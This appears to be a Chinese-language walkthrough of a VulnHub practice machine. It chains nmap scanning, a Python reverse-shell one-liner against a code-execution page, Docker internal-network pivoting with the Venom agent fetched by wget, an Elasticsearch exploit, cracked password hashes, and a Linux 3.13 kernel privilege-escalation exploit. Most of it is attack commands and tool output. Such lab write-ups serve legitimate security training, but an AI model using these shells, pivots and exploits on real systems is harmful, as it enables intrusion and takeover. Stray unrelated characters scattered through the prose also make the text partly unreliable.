靶機信息
https://www.vulnhub.com/entry/boredhackerblog-social-network,454/
主機褐耳、端口叨襟、服務(wù)
- 主機發(fā)現(xiàn) arp-scan -l
- nmap -sP 192.168.0.1/24
- 端口發(fā)現(xiàn) - nmap -p- 192.168.0.102
- 服務(wù)發(fā)現(xiàn)nmap -p22,5000 -sV 192.168.0.102
目標(biāo)主機開啟了5000端口,服務(wù)為werkzeug怠噪。
目標(biāo)網(wǎng)站滲透
- 瀏覽器打開http://192.168.0.102:5000
-
使用掃描工具先進行路徑掃描马篮,發(fā)現(xiàn)存在/admin目錄
- http://192.168.0.102:5000/admin 目錄中存在代碼執(zhí)行漏洞晤柄,目標(biāo)系統(tǒng)為python,可能為python代碼亿昏,需要用到python反彈shell
- nc監(jiān)聽端口 nc -nvlp 4444
- 反彈shell 峦剔,拿到權(quán)限
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.102",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
判斷目標(biāo)服務(wù)器是否為docker
內(nèi)網(wǎng)掃描
/app # for i in $(seq 1 10); do ping -c 1 172.17.0.$i;done
PING 172.17.0.1 (172.17.0.1): 56 data bytes
64 bytes from 172.17.0.1: seq=0 ttl=64 time=0.036 ms
--- 172.17.0.1 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.036/0.036/0.036 ms
PING 172.17.0.2 (172.17.0.2): 56 data bytes
64 bytes from 172.17.0.2: seq=0 ttl=64 time=0.041 ms
--- 172.17.0.2 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.041/0.041/0.041 ms
PING 172.17.0.3 (172.17.0.3): 56 data bytes
64 bytes from 172.17.0.3: seq=0 ttl=64 time=0.124 ms
--- 172.17.0.3 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.124/0.124/0.124 ms
PING 172.17.0.4 (172.17.0.4): 56 data bytes
內(nèi)網(wǎng)滲透
- 基本原理:使用代理工具,建立kali與內(nèi)網(wǎng)機器的一條隧道角钩,將kali與內(nèi)網(wǎng)機器打通吝沫,kali中的工具可以通過該隧道進行工作呻澜。
- Vemon基本步驟:
- 將agent拷貝到目標(biāo)主機;使用 python3 -m http.server 80 在主機建立http服務(wù)惨险;
- 在目標(biāo)內(nèi)網(wǎng)服務(wù)器中使用wget http://192.168.0.103/a下載agent羹幸,可執(zhí)行權(quán)限chmod +x a
- 開啟vemon服務(wù)端 ./admin_linux_x64 -lport 9999
- 開啟vemon客戶端 ./a -rhost 192.168.0.103 -rport 9999
- venom:
┌──(kali?kali)-[~/Desktop/tmp/Venom v1.1.0]
└─$ ./admin_linux_x64 -lport 9999
Venom Admin Node Start...
____ ____ { v1.1 author: Dlive }
\ \ / /____ ____ ____ _____
\ Y // __ \ / \ / \ / \
\ /\ ___/| | ( <_> ) Y Y \
\___/ \___ >___| /\____/|__|_| /
\/ \/ \/
(admin node) >>>
[+]Remote connection: 192.168.0.101:55035
[+]A new node connect to admin node success
(admin node) >>> show
A
+ -- 1
(admin node) >>> goto 1
node 1
(node 1) >>> socks 1080
a socks5 proxy of the target node has started up on the local port 1080.
(node 1) >>>
配置proxychain
sudo vi /etc/proxychains4.conf
socks5 127.0.0.1 1080使用nmap工具掃描內(nèi)網(wǎng)地址
proxychain4 nmap -Pn 172.17.0.1
proxychain4 nmap -p22,5000 -sV 172.17.0.1
發(fā)現(xiàn) 172.17.0.1是192.168.0.102的內(nèi)網(wǎng)地址掃描其他主機
proxychains4 nmap -p9200 -sV 172.17.0.2
掃描出開放9200端口,運行es服務(wù)使用es滲透腳本辫愉,拿到172.17.0.2的權(quán)限
┌──(kali?kali)-[~]
└─$ searchsploit Elasticsearch
----------------------- ---------------------------------
Exploit Title | Path
----------------------- ---------------------------------
ElasticSearch - Remote | linux/remote/36337.py
ElasticSearch - Remote | multiple/webapps/33370.html
ElasticSearch - Search | java/remote/36415.rb
ElasticSearch 1.6.0 - | linux/webapps/38383.py
ElasticSearch < 1.4.5 | php/webapps/37054.py
ElasticSearch Dynamic | java/remote/33588.rb
----------------------- ---------------------------------
Shellcodes: No Results
cp /usr/share/exploitdb/exploits/php/webapps/36337.py .
proxychains4 python 36337.py 172.17.0.2
- 檢查服務(wù)器文件栅受,有一個passwords文件
Format: number,number,number,number,lowercase,lowercase,lowercase,lowercase
Example: 1234abcd
john:3f8184a7343664553fcb5337a3138814 1337hack
test:861f194e9d6118f3d942a72be3e51749
admin:670c3bbc209a18dde5446e5e6c1f1d5b
root:b3d34352fc26117979deabdf1b9b6354
jane:5c158b60ed97c723b673529b8a3cf72b
- 登錄目標(biāo)服務(wù)器192.168.0.102,john賬號是用戶恭朗,非root屏镊,考慮通過內(nèi)核漏洞提權(quán)。
內(nèi)核提權(quán)
- 檢查內(nèi)核信息:
uname -a
Linux socnet 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
- 檢查linux 3.13內(nèi)核漏洞:searchsploit 3.13
- 檢查漏洞利用腳本37292.c痰腮,其中有涉及到gcc二次編譯的內(nèi)容而芥,刪除gcc命令相關(guān)的代碼,將涉及編譯的ofs-lib.so文件直接拷貝到同級目錄中诽嘉;
- 編譯修改好的漏洞腳本
-
通過wget將編譯好的腳本及ofs-lib.so文件直接上傳到靶機蔚出,即可拿到root權(quán)限。
知識點總結(jié):
- 主機虫腋、端口骄酗、服務(wù)掃描
- web目錄掃描
- python反彈shell
- 內(nèi)網(wǎng)掃描、內(nèi)網(wǎng)穿透
- 內(nèi)核提權(quán)